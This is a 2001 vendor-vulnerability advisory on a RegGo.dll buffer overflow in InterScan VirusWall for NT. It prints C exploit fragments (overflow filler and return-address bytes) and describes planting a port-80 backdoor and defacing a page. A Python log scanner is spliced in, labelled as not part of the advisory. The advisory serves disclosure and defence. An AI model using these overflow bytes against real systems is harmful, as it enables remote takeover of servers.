SNS Advisory No.27
InterScan VirusWall for NT 3.51 Buffer Overflow Vulnerability

Japanese Edition: http://www.lac.co.jp/security/intelligence/SNSAdvisory/27.html

Problem first discovered: 20 Apr 2001
Published: 31 May 2001
Last Updated: 31 May 2001
_________________________________________________________________

Overview:

A vulnerability was found in the InterScan VirusWall for NT 3.5 from Trend Micro Inc.

Problem Description:

InterScan VirusWall provides high-performance three-in-one Internet gateway protection against viruses and malicious code via SMTP, HTTP and FTP.

A buffer overflow vulnerability exists in the RegGo.dll file installed under \Interscan\cgi-bin\. This problem can allow remote users to execute arbitrary commands with system privilege.

Example of malicious code:

(For English Version)

    for ( j=0 ; j<816 ; j++ ) sploit[j]='a' ;
    sploit[j++]=0xEB ;
    sploit[j++]=0x06 ;
    sploit[j++]=0x90 ;
    sploit[j++]=0x90 ;
    sploit[j++]=0x79 ;
    sploit[j++]=0x16 ;
    sploit[j++]=0xF2 ;
    sploit[j++]=0x77 ;
    sploit[j++]=0xCC ;  --> any code will be executed

(For Japanese Version)

    for ( i=0 ; i<820 ; i++ ) sploit[i] = 'a' ;
    sploit[i++] = 0x15 ;
    sploit[i++] = 0xAD ;
    sploit[i++] = 0xEE ;
    sploit[i++] = 0x77 ;
    sploit[i++] = 0xCC ;

Fig1: tool (Making a backdoor on port 80)
Fig2: Connect to the backdoor (port 80) (defacing default.htm)
Fig3: Default.htm on the victim host

Tested Version:

InterScan VirusWall for NT 3.5 English
InterScan VirusWall for NT 3.51 Build 1321 English
InterScan VirusWall for NT 3.51 J

Tested on:

Windows NT 4.0 SP6

Status of fixes:

The Trend Micro support team will fix this issue in InterScan version 3.51 Build 1349. Until the patch is released, it is recommended to set up access control to refuse access to servers where IIS has been installed.
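To complement the access-control workaround above, the following added example (not part of the advisory or of Trend Micro's product) scans IIS W3C-format web server logs for requests to RegGo.dll that are far larger than a registration form should need, or that come from addresses outside an allow-list. The log lines, the field layout and the 512-byte threshold are constructed assumptions; the advisory's own samples place 816 (English) or 820 (Japanese) filler bytes before the overwrite, so the threshold sits well below that.

```python
# Constructed sample of IIS W3C extended log lines (not taken from the advisory).
# The "#Fields:" header declares the column layout, so the parser is self-describing.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query cs-bytes sc-status
2001-04-20 10:01:02 192.0.2.10 GET /interscan/cgi-bin/RegGo.dll key=abc 120 200
2001-04-20 10:01:09 198.51.100.7 POST /interscan/cgi-bin/RegGo.dll - 900 200
2001-04-20 10:01:15 198.51.100.7 GET /interscan/cgi-bin/RegGo.dll {q} 1020 200
2001-04-20 10:02:00 192.0.2.10 GET /default.htm - 80 200
""".format(q="key=" + "a" * 830)

# Assumed threshold: the advisory's samples need 816/820 filler bytes before the
# return address is overwritten, so anything above 512 bytes is worth an alert.
MAX_SAFE_BYTES = 512
TARGET = "/interscan/cgi-bin/reggo.dll"   # compared case-insensitively


def parse_w3c(text):
    """Yield one dict per data line, keyed by the most recent #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_reggo_overflow_attempts(text, max_bytes=MAX_SAFE_BYTES, allowed_ips=()):
    """Return (client ip, reason) for each suspicious request to RegGo.dll.

    A request is flagged when its query string or received byte count exceeds
    max_bytes, or (if an allow-list is given) when the client is not on it.
    """
    hits = []
    for rec in parse_w3c(text):
        if rec.get("cs-uri-stem", "").lower() != TARGET:
            continue
        query = rec.get("cs-uri-query", "-")
        qlen = 0 if query == "-" else len(query)
        received = int(rec.get("cs-bytes", "0"))
        if qlen > max_bytes or received > max_bytes:
            hits.append((rec["c-ip"], f"oversized request ({max(qlen, received)} bytes)"))
        elif allowed_ips and rec["c-ip"] not in allowed_ips:
            hits.append((rec["c-ip"], "RegGo.dll reached from non-allowed address"))
    return hits


if __name__ == "__main__":
    for ip, reason in find_reggo_overflow_attempts(SAMPLE_LOG, allowed_ips=("192.0.2.10",)):
        print(f"ALERT {ip}: {reason}")
```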
The patch is available at the following site:
http://www.antivirus.com/download/patches/

Disclaimer:

All information in these advisories is subject to change without advance notice or mutual consensus, and each advisory is released as is. LAC Co., Ltd. is not responsible for any risks arising from applying this information.
_________________________________________________________________

Copyright(c) 1995-2002 Little eArth Corporation